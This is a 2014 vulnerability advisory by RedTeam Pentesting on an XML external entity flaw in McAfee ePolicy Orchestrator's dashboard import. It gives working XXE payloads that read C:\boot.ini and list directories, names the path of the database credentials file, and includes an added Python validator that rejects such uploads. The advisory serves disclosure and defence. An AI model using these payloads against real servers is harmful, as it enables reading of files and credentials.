McAfee ePolicy Orchestrator XML External Entity Expansion
Posted Feb 25, 2014
Site redteam-pentesting.de

RedTeam Pentesting identified an XML external entity expansion vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature. Users with the ability to create new dashboards in the ePO web interface who exploit this vulnerability can read local files on the ePO server, including sensitive data like the ePO database configuration. Versions 4.6.7 and below are affected.

tags | exploit, web, local, xxe
SHA-256 | f7760236a00eacc72f537370300bd2e7c27f9ec542d2cb4813cf607dd4d9f889

Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in
Dashboard

RedTeam Pentesting identified an XML external entity expansion
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.
Users with the ability to create new dashboards in the ePO web interface
who exploit this vulnerability can read local files on the ePO server,
including sensitive data like the ePO database configuration.


Details
=======

Product: McAfee ePolicy Orchestrator
Affected Versions: 4.6.7 and below
Fixed Versions: 4.6.7 + hotfix 940148
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx
Vendor Status: hotfix released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001
Advisory Status: public
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

McAfee ePO allows administrators to centrally manage other systems,
including deploying new software and collecting system information.
Dashboards allow privileged users to view statistics and current data
about ePO and associated systems.


More Details
============

Users with access to McAfee ePO's web interface can be granted the
permission to add new dashboards. Dashboard definitions can be exported
as XML data and imported again. A basic XML dashboard definition looks
as follows:

<dashboard id="1">
  <name>RedTeam Pentesting</name>
  <filteringEnabled>false</filteringEnabled>
</dashboard>

Importing a dashboard consists of uploading the XML data and confirming
the import afterwards. On the confirmation page the dashboard's name
defined in the XML tag "name" is shown.

The ePO system accepts a user-defined DTD in the XML data, so additional
entities can be declared, which the system then expands. The following
example results in a dashboard with the name "RedTeam Pentesting
Entity":

<?xml version="1.0"?>
<!DOCTYPE dashboard [
  <!ENTITY redteam "RedTeam Pentesting Entity">
]>
<dashboard id="1">
  <name>&redteam;</name>
  <filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to specify external entities that, for example,
point to local files on the ePO server. The entity is then expanded to
contain the file's content. This works as long as the file contents do
not make the resulting XML data invalid. Files that cannot be read this
way include, for example, binary files and files that themselves contain
XML data.

If the entity is used in the dashboard's name, the confirmation page
shown when importing a dashboard displays the contents of the file.

The following example XML data can be uploaded to read the file
C:\boot.ini:

<?xml version="1.0"?>
<!DOCTYPE dashboard [
  <!ENTITY redteam SYSTEM "file:///c:/boot.ini">
]>
<dashboard id="1">
  <name>&redteam;</name>
  <filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to get directory listings by using a file URL that
points to a directory, for example the C: drive:

<!ENTITY redteam SYSTEM "file:///c:/">
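The root cause above is that the dashboard importer parses untrusted XML with DTD processing enabled. The following is an added example (not McAfee's or RedTeam Pentesting's code) of how an importer can validate an upload before parsing it: any DOCTYPE is rejected, since a dashboard definition never needs one, and the DTD is inspected with expat (which has no ExternalEntityRefHandler here and therefore never fetches anything) so that a log entry can distinguish an external SYSTEM entity, i.e. an XXE attempt, from a harmless internal entity. The sample uploads are constructed from the definitions shown in this advisory.

```python
# Added example, not McAfee's or RedTeam Pentesting's code: pre-import
# validation of dashboard XML. Policy: no DOCTYPE at all. The DTD is still
# inspected so the rejection can be logged as "DTD" or "external entity".
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DashboardRejected(Exception):
    pass


def inspect_dtd(data: bytes) -> dict:
    """Record DOCTYPE and entity declarations without resolving any entity."""
    found = {"doctype": False, "internal": [], "external": []}
    parser = xml.parsers.expat.ParserCreate()  # no ExternalEntityRefHandler
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_subset: found.update(doctype=True))

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            found["external"].append((name, sysid))  # XXE indicator
        else:
            found["internal"].append(name)

    parser.EntityDeclHandler = entity_decl
    parser.Parse(data, True)
    return found


def import_dashboard_name(data: bytes) -> str:
    """Return the name the confirmation page would show, or reject the upload."""
    found = inspect_dtd(data)
    if found["doctype"]:
        what = ("external entity %s" % found["external"]
                if found["external"] else "DTD")
        raise DashboardRejected("dashboard import rejected: %s not allowed" % what)
    root = ET.fromstring(data)
    if root.tag != "dashboard" or root.findtext("name") is None:
        raise DashboardRejected("not a dashboard definition")
    return root.findtext("name")


# Constructed uploads: the plain definition and the XXE variant from the advisory.
PLAIN = (b'<dashboard id="1"><name>RedTeam Pentesting</name>'
         b'<filteringEnabled>false</filteringEnabled></dashboard>')
XXE = (b'<?xml version="1.0"?>\n<!DOCTYPE dashboard [\n'
       b'<!ENTITY redteam SYSTEM "file:///c:/boot.ini">\n]>\n'
       b'<dashboard id="1"><name>&redteam;</name>'
       b'<filteringEnabled>false</filteringEnabled></dashboard>')

if __name__ == "__main__":
    print(import_dashboard_name(PLAIN))
    try:
        import_dashboard_name(XXE)
    except DashboardRejected as e:
        print(e)
```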


Workaround
==========

RedTeam Pentesting is not aware of any workarounds.


Fix
===

McAfee has issued a hotfix[0] for version 4.6.7 that removes the
vulnerability. An upgrade to the newer 5.x branch of the product will
also resolve this problem.


Security Risk
=============

The vulnerability is mitigated by the fact that successful exploitation
requires valid login credentials for the ePO system and the permission
to create dashboards.

It is still considered to have a high risk potential, however, as it
gives attackers the opportunity to read potentially sensitive file
contents on the server. This includes, for example, ePO's database
credentials, which are typically stored in a file at a path like the
following:

C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties

The credentials in this file are encrypted with a static key that is
publicly known and included for example in Metasploit[1].

Depending on the actual network structure, it might be possible to use
the decrypted credentials to read and alter the information in the ePO
database. This might lead to a compromise of the clients that are
managed by ePO.


Timeline
========

2013-11-20 Vulnerability identified
2013-11-22 Customer decided to coordinate disclosure with vendor
2014-02-14 Vendor replied to customer
2014-02-24 Vendor released hotfix for version 4.6.7 and a public
Security Bulletin[0]
2014-02-25 Advisory released


References
==========

[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests and short
pentests, performed by a team of specialised IT-security experts. In
this way, security weaknesses in company networks or products are
uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance public knowledge through research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH
Dennewartstr. 25-27
52068 Aachen
Germany

Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen